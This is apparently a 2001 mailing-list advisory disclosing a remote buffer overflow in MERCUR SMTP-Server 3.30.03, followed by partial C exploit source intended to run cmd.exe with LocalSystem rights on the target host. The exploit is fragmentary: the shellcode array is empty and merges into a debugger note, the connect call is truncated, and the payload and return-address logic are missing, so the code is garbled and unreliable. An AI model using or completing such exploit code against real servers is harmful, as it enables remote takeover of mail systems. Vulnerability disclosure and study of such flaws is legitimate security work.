From: Martin NA (martinDIRECT.SPB.RU)
Date: Fri Feb 23 2001 - 06:32:10 CST


    By default the SMTP server is installed to be run from the
    LocalSystem account.
    This makes it easy to make any action on the target
    system if an attacker
    could gain control over the code execution flow of the

    Particularly, MERCUR SMTP-Service (binary
    MCRSMTP.EXE version
    suffers from buffer overflow illustrated below:

    -- Telnet session start --

    220 MERCUR SMTP-Server (v3.30.03 Unregistered) for Windows NT ready at Thu, 15 Feb 2001 03:55:34 -0800

    Connection to host lost.


    -- Telnet session end --

    Submission of a string which contains the address the
    processor should jump to at
    positions 133, 134, 135 and 136 will gain full control
    over the machine...

    Here is exploit that runs an instance of cmd.exe on
    target host:

    /*
     MERCUR Mailserver 3.3 Remote Buffer Overflow
     Tested on Win2K AS SP1 with MERCUR SMTP-Server v3.30.03
     Martin Rakhmanoff
    */

    #include <winsock2.h>
    #include <stdio.h>

    /* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */
    char shellcode[] =
    In SoftICE bpx 001b:00418b65 - here eip is restored
    with overwritten

    int main(int argc, char * argv[]){

     int i;
     char sploit[512];
     char buffer[512];

     WSADATA wsaData;
     SOCKET sock;
     struct sockaddr_in server;
     struct hostent *hp;

     hp = gethostbyname("arena");
     server.sin_family = hp->h_addrtype;
     server.sin_port = htons(25);
     sock = socket(AF_INET,SOCK_STREAM,0);
     connect(sock,(struct sockaddr*)&server,sizeof



     // Return address






     return 0;

    Vendor was notified but no action was done...